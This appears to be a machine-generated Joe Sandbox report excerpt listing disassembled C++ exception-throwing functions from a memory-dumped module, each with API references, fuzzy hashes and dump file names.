                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 0ba250eb4f30e1a623855003dde2b7cebd33d3f34564f8a1857e38c790c1efea
                                                                                                          • Instruction ID: 98a6eb9d869ef76b50b182843ef847d5e2417ec765f4f5edee4635b4ec519e70
                                                                                                          • Opcode Fuzzy Hash: 0ba250eb4f30e1a623855003dde2b7cebd33d3f34564f8a1857e38c790c1efea
                                                                                                          • Instruction Fuzzy Hash: 47F06276914308AFC708DF99D441F8ABBF8EF45350B40C16ED9599B355EB31E900CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034878
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03488D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: d2ad9bf1453201ade7f017510f22bc1a388178471fa5128802d0f1d898ec23d1
                                                                                                          • Instruction ID: 1a0689fec809d1f69d9f8ccb1df925fe249cccd77ba2ecc57e87810c2613c41e
                                                                                                          • Opcode Fuzzy Hash: d2ad9bf1453201ade7f017510f22bc1a388178471fa5128802d0f1d898ec23d1
                                                                                                          • Instruction Fuzzy Hash: 26F06276904709AFC704DF59D841B8AB7F8AF45350B40C5AED8199B354EB31EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034780 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0347A8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0347BD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: c31a0f0a56ed0a4184c22b3956ffda4eeac4745fd621469c09932302b510e2ed
                                                                                                          • Instruction ID: f4febdf09288683b3e32b42d9ca8b1ea57f66b7e35464e56ba0671cb5d8038d9
                                                                                                          • Opcode Fuzzy Hash: c31a0f0a56ed0a4184c22b3956ffda4eeac4745fd621469c09932302b510e2ed
                                                                                                          • Instruction Fuzzy Hash: B7F04F76904308AFD718DF59D841B8AB7F8AF55750B00C26AD8199B264EB71F900CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034568
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03457D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 2ae14be12a0b7d554497733a489c7e89fbdd1c2e2464401d7e9b2eac7263835e
                                                                                                          • Instruction ID: 2282625ea7f607ce7e6b80d9a381d49e2b2f4b3097ad0f1a183e2b4fb027fe14
                                                                                                          • Opcode Fuzzy Hash: 2ae14be12a0b7d554497733a489c7e89fbdd1c2e2464401d7e9b2eac7263835e
                                                                                                          • Instruction Fuzzy Hash: 5FF06276D14309AFCB04DF59D841B8ABBF8AF45350B40C16EE8199B355EB31EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034428
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03443D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 47dec7640146fb96652b79549edd6627a4688ef06b4a7dfbb0e8cebc1b959885
                                                                                                          • Instruction ID: 1a687e0879362b5199a940779111f8a47cb6241c8868401a3d3466958df354ff
                                                                                                          • Opcode Fuzzy Hash: 47dec7640146fb96652b79549edd6627a4688ef06b4a7dfbb0e8cebc1b959885
                                                                                                          • Instruction Fuzzy Hash: 51F06276904309AFC704DF59D841B8AB7F8BF55350B40C16ED8199B354EB31E900CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0344A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0344C8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0344DD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 39037b4ebfbac6848fc3b53f1ba76c5b5960ffd9e157ec8361fd8048bf854b1b
                                                                                                          • Instruction ID: 9c0251044bb1666e8e85f73b8734b39153f7b9e08dcfbdb9bcbb758553d4b94b
                                                                                                          • Opcode Fuzzy Hash: 39037b4ebfbac6848fc3b53f1ba76c5b5960ffd9e157ec8361fd8048bf854b1b
                                                                                                          • Instruction Fuzzy Hash: 5DF06276904308AFC714DF59D841B8AB7F8BF44350B10C16ED8199B364EB31E940CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F054340 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F054368
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05437D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 6294703c19c021adbd23d9b644030b1e9daf09cbb26f1807eaf58c425470e292
                                                                                                          • Instruction ID: a221a687f2b6c6dbcf782b592a74a533414a9e9b32b2921a3e8e2a84997eedc4
                                                                                                          • Opcode Fuzzy Hash: 6294703c19c021adbd23d9b644030b1e9daf09cbb26f1807eaf58c425470e292
                                                                                                          • Instruction Fuzzy Hash: 4DF04F75910308AFC708DF59D941A8AB7F8AF45350B40C16AE8199B264EB71EA10CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045B20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045B49
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045B5E
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 76e3f75fe7628389d0277e95cdbc882a8117588988123412f9f840025373226e
                                                                                                          • Instruction ID: 887f110e306a4e3594bd2eaad87bf3963779f612315a18be9d03c1949b4ef205
                                                                                                          • Opcode Fuzzy Hash: 76e3f75fe7628389d0277e95cdbc882a8117588988123412f9f840025373226e
                                                                                                          • Instruction Fuzzy Hash: B6F0BB76D00208AAD704DF98D841BCA77F8AF51350F404179DD099B180EB71A704C7E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F053050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F053078
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05308D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: c4564955dafbc3822509773fa928dfedce6640c14cbb971cf6361a87345ac1c4
                                                                                                          • Instruction ID: e3ceadfa58bb4fb4a8dcffedd1e6cd9e3bed1631a107005342fc9f75f5df6fff
                                                                                                          • Opcode Fuzzy Hash: c4564955dafbc3822509773fa928dfedce6640c14cbb971cf6361a87345ac1c4
                                                                                                          • Instruction Fuzzy Hash: F5F06276900308AFC714DF59D841B8AB7F8AF48350B40C16ED8199B355EB71E904CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034CD8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034CED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: c4956defce35072b9e0d4c16c546f9cc6f43dacc70fbc99ee3610410e6056b73
                                                                                                          • Instruction ID: a9dfff1ba7b9e5b61ac9f6b980a33d3021d7565f29e792204700a5700025e516
                                                                                                          • Opcode Fuzzy Hash: c4956defce35072b9e0d4c16c546f9cc6f43dacc70fbc99ee3610410e6056b73
                                                                                                          • Instruction Fuzzy Hash: 5EF05476914319AFD704DF98D941B8A7BF8AF15340F40C16EDD199B254EB32EA04CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0349A8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0349BD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
